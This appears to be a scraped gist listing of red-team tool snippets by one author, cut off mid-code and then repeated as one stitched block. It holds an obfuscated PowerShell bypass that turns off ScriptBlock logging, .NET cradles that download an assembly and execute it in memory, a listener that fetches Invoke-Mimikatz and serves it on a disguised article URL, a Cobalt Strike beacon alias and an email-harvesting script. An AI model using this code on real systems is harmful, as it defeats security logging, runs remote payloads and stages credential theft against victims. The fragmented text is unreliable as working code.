Ryan Cobb cobbr

## win_domain_child.ps1
#!powershell

# Copyright: (c) 2022 Jordan Borean (@jborean93) jborean93@gmail.com
# Copyright: (c) 2023, Ryan Cobb <ryancobb65@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

#AnsibleRequires -CsharpUtil Ansible.Basic

# win_domain_child module

## ScriptBlockLogBypass.ps1
# ScriptBlock Logging Bypass
# @cobbr_io

$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }

## DotnetAssemblyDownloadCradle.cs
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }

## Invoke-ObfuscationDetection.ps1
function Measure-CharacterFrequency
{
    <#

    .SYNOPSIS

    Measures the letter / character frequency in a block of text, ignoring whitespace
    and PowerShell comment blocks.

    Author: Lee Holmes

## hunter.py
import requests
import sys
if len(sys.argv) is 3:
  domain = sys.argv[1]
  api_key = sys.argv[2]
  if domain is not None:
    url = "https://hunter.io/v2/domain-search?limit=10000&offset=0&domain="\
    +domain+"&api_key="+api_key+"&format=json"
    hunterJsonData = requests.get(url)
    for email in hunterJsonData.json()['data']['emails']:

## reflection-example-3
public class Program {
    public static void Main() {
        System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData("https://example.com/SharpSploit.dll")).GetType("SharpSploit.Execution.Shell").GetMethod("ShellExecute").Invoke(0, @("whoami", "", "", ""));
    }
}

## server.ps1
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8080/")
$Hso.Start()
While ($Hso.IsListening) {
    $HC = $Hso.GetContext()
    $HRes = $HC.Response
    $HRes.Headers.Add("Content-Type","text/plain")
    If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
        $Buf = [Text.Encoding]::UTF8.GetBytes($mk)

## covenant-razor-example-1.cs
@using Covenant.Core
@using Covenant.Models.Grunts
@model GruntTasking
@{
    Layout = "_GruntTaskingLayout";
    ViewData["Title"] = "Grunts";
}
<div class="d-flex justify-content-between flex-wrap flex-md-nowrap pb-2 mb-3">
    <h1 class="h2">GruntTasking: <span id="tasking-name" class="text-primary">@Html.DisplayFor(model => model.Name)</span></h1>
</div>

## sharpgen.cna
$dotnetpath = "/usr/local/share/dotnet/dotnet";
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
$temppath = "/tmp/";

beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");

alias sharpgen{
	$executionId  = "sharpgen_" . int(rand() * 100000);
	$temporaryCsharp =  $temppath . $executionId . ".cs";
	$executableFilename = $temppath . $executionId . ".exe";

## sharpgen-example-4
cobbr@mac:~/SharpGen > cp -r ~/GhostPack/SharpWMI/SharpWMI ./Source
cobbr@mac:~/SharpGen > cat example.txt
SharpWMI.Program.LocalWMIQuery("select * from win32_service");
Console.WriteLine(Host.GetProcessList());
cobbr@mac:~/SharpGen > dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --source-file example.txt
...
[*] Compiled assembly written to: /Users/cobbr/SharpGen/Output/example.exe
	#!powershell

	# Copyright: (c) 2022 Jordan Borean (@jborean93) jborean93@gmail.com
	# Copyright: (c) 2023, Ryan Cobb <ryancobb65@gmail.com>
	# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

	#AnsibleRequires -CsharpUtil Ansible.Basic

	# win_domain_child module
	# ScriptBlock Logging Bypass
	# @cobbr_io

	$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
	If ($GroupPolicyField) {
	$GroupPolicyCache = $GroupPolicyField.GetValue($null)
	If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
	}
	function Measure-CharacterFrequency
	{
	<#

	.SYNOPSIS

	Measures the letter / character frequency in a block of text, ignoring whitespace
	and PowerShell comment blocks.

	Author: Lee Holmes
	import requests
	import sys
	if len(sys.argv) is 3:
	domain = sys.argv[1]
	api_key = sys.argv[2]
	if domain is not None:
	url = "https://hunter.io/v2/domain-search?limit=10000&offset=0&domain="\
	+domain+"&api_key="+api_key+"&format=json"
	hunterJsonData = requests.get(url)
	for email in hunterJsonData.json()['data']['emails']:
	public class Program {
	public static void Main() {
	System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData("https://example.com/SharpSploit.dll")).GetType("SharpSploit.Execution.Shell").GetMethod("ShellExecute").Invoke(0, @("whoami", "", "", ""));
	}
	}
	$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
	$Hso = New-Object Net.HttpListener
	$Hso.Prefixes.Add("http://+:8080/")
	$Hso.Start()
	While ($Hso.IsListening) {
	$HC = $Hso.GetContext()
	$HRes = $HC.Response
	$HRes.Headers.Add("Content-Type","text/plain")
	If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
	$Buf = [Text.Encoding]::UTF8.GetBytes($mk)
	@using Covenant.Core
	@using Covenant.Models.Grunts
	@model GruntTasking
	@{
	Layout = "_GruntTaskingLayout";
	ViewData["Title"] = "Grunts";
	}
	<div class="d-flex justify-content-between flex-wrap flex-md-nowrap pb-2 mb-3">
	<h1 class="h2">GruntTasking: <span id="tasking-name" class="text-primary">@Html.DisplayFor(model => model.Name)</span></h1>
	</div>
	$dotnetpath = "/usr/local/share/dotnet/dotnet";
	$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
	$temppath = "/tmp/";

	beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");

	alias sharpgen{
	$executionId = "sharpgen_" . int(rand() * 100000);
	$temporaryCsharp = $temppath . $executionId . ".cs";
	$executableFilename = $temppath . $executionId . ".exe";
	cobbr@mac:~/SharpGen > cp -r ~/GhostPack/SharpWMI/SharpWMI ./Source
	cobbr@mac:~/SharpGen > cat example.txt
	SharpWMI.Program.LocalWMIQuery("select * from win32_service");
	Console.WriteLine(Host.GetProcessList());
	cobbr@mac:~/SharpGen > dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --source-file example.txt
	...
	[*] Compiled assembly written to: /Users/cobbr/SharpGen/Output/example.exe